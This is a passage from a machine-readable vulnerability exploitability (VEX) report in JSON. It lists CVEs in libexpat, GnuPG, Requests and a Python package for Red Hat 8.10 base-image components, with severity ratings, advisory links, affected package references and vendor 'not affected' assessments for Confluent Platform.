          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/482d6f8bdba9da3725d272e8bb4a2d25fb6a603e"
        },
        {
          "url": "https://github.com/python/cpython/commit/69ddd9bb2cc4bd69b1565647c18659c6a789ccd9"
        },
        {
          "url": "https://github.com/python/cpython/commit/876858c9f65d9ab656c7fa639f268ce7856d89dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/a51b1b512de1d56b3714b65628a2eae2b07e535e"
        },
        {
          "url": "https://github.com/python/cpython/commit/c70adad78caeeea33f92f560ecb93331ca11bf66"
        },
        {
          "url": "https://github.com/python/cpython/commit/e58e9802b9bec5cdbf48fc9bf1da5f4fda482e86"
        },
        {
          "url": "https://github.com/python/cpython/issues/145506"
        },
        {
          "url": "https://github.com/python/cpython/pull/145507"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-2297.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2297"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2297"
        }
      ],
      "published": "2026-03-04T23:16:10+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24515",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24515"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24515"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1131"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24515"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8022-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8023-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24515"
        }
      ],
      "published": "2026-01-23T08:16:01+00:00",
      "updated": "2026-06-17T10:23:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.5.0-2.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/expat@2.5.0-2.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-24883",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In GnuPG before 2.5.17, a long signature packet length causes parse_signature to return success with sig->data[] set to a NULL value, leading to a denial of service (application crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-24883"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-24883"
        },
        {
          "url": "https://dev.gnupg.org/T8049"
        },
        {
          "url": "https://github.com/advisories/GHSA-7246-cvp4-g68w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24883"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24883"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/01/27/8"
        }
      ],
      "published": "2026-01-27T19:16:16+00:00",
      "updated": "2026-06-17T10:23:44+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.2.20-4.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/gnupg2@2.2.20-4.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-25645",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        377
      ],
      "description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
      "recommendation": "; Upgrade requests to version 2.33.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25645"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25645"
        },
        {
          "url": "https://github.com/psf/requests"
        },
        {
          "url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"
        },
        {
          "url": "https://github.com/psf/requests/releases/tag/v2.33.0"
        },
        {
          "url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25645"
        }
      ],
      "published": "2026-03-25T17:16:52+00:00",
      "updated": "2026-06-17T10:25:00+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/requests@2.32.5",
          "versions": [
            {
              "version": "2.32.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
